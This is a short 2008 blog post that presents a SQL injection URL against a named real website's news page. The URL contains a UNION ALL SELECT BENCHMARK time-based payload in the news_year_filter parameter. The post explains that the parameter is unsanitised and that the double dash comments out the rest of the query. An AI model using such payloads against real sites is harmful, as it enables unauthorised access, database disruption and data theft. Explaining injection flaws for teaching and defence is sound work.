Monday, January 21, 2008

Here's a great example of SQL Injection:

http://riaa.com/news_room.php?resultpage=9&news_year_filter=2007%20UNION%20ALL%20SELECT%20BENCHMARK(100000000,MD5('asdf')),NULL,NULL,NULL,NULL%20--

The new years filter URL variable is not cleaned up before it's put into the SQL. Notice the double dash closing off the rest of the SQL from messing up the injection.

0 Comments:

Post a Comment

Subscribe to Post Comments [Atom]

Links to this post:

Create a Link

<< Home